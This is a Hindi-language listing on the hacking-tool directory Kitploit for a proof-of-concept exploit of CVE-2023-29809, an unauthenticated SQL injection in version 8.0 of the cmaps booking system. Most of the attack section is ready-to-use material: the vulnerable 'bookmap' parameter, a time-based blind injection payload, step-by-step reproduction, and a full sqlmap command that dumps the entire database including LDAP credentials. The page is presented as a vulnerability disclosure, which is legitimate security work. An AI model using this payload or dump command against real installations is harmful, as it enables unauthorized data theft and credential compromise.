Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-29809 — CVE-2023-29809 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: cmaps बुकिंग सिस्टम में बिना प्रमाणीकरण के SQL इंजेक्शन। समय-आधारित ब्लाइंड इंजेक्शन का प्रदर्शन करता है और डेटाबेस निष्कर्षण के लिए sqlmap कमांड प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/zprototype/cve-2023-29809
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubzprototype/cve-2023-29809

CVE-2023-29809

CVE-2023-29809 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: cmaps बुकिंग सिस्टम में बिना प्रमाणीकरण के SQL इंजेक्शन। समय-आधारित ब्लाइंड इंजेक्शन का प्रदर्शन करता है और डेटाबेस निष्कर्षण के लिए sqlmap कमांड प्रदान करता है।

रिपॉजिटरी देखें
113 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

शोषण शीर्षक: अनधिकृत SQL इंजेक्शन

  • Google Dork:
  • दिनांक: 27.04.2023
  • शोषण लेखक: Lucas Noki (0xPrototype)
  • विक्रेता होमपेज: https://github.com/vogtmh
  • सॉफ्टवेयर लिंक: https://github.com/vogtmh/cmaps
  • संस्करण: 8.0
  • परीक्षण किया गया: Mac, Windows, Linux
  • CVE : CVE-2023-29809

विवरण:

पाई गई कमजोरी एक SQL इंजेक्शन है। bookmap पैरामीटर संवेदनशील है। जब पेज पर जाते हैं: http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test तो हमें सामान्य JSON प्रतिक्रिया मिलती है। हालांकि यदि bookmap पैरामीटर के मान में एक एकल उद्धरण जोड़ा जाता है तो हमें एक त्रुटि संदेश मिलता है:

root@kitploit:~
<b>Warning</b>: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in <b>/var/www/html/rest/booking/index.php</b> on line <b>152</b><br />

अब यदि दो एकल उद्धरण जोड़े जाते हैं तो हमें बिना किसी त्रुटि के सामान्य प्रतिक्रिया मिलती है। यह SQL इंजेक्शन के अवसर की पुष्टि करता है। वास्तव में SQL इंजेक्शन साबित करने के लिए हम निम्नलिखित पेलोड जोड़ते हैं:

root@kitploit:~
'-(select*from(select+sleep(2)+from+dual)a)--+

पेज दो सेकंड के लिए सो जाएगा। यह SQL इंजेक्शन की पुष्टि करता है।

पुनरुत्पादन के चरण:

  1. कमजोरी का परीक्षण करने के लिए निम्नलिखित पेलोड भेजें: '-(select*from(select+sleep(2)+from+dual)a)--+

  2. यदि साइट दो सेकंड के लिए सो गई तो पूरे डेटाबेस को ldap क्रेडेंशियल्स समेत डंप करने के लिए निम्नलिखित sqlmap कमांड चलाएँ।

    root@kitploit:~
    python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump
    

विशेष धन्यवाद iCaotix को जिन्होंने पर्यावरण सेटअप करने और मेरे पेलोड को डीबग करने में बहुत मदद की।

सर्वर से अनुरोध:

Screenshot 2023-04-30 at 22.23.51

सर्वर से प्रतिक्रिया:

प्रतिक्रिया समय देखें।

Screenshot 2023-04-30 at 22.24.35
टूल डाउनलोड करें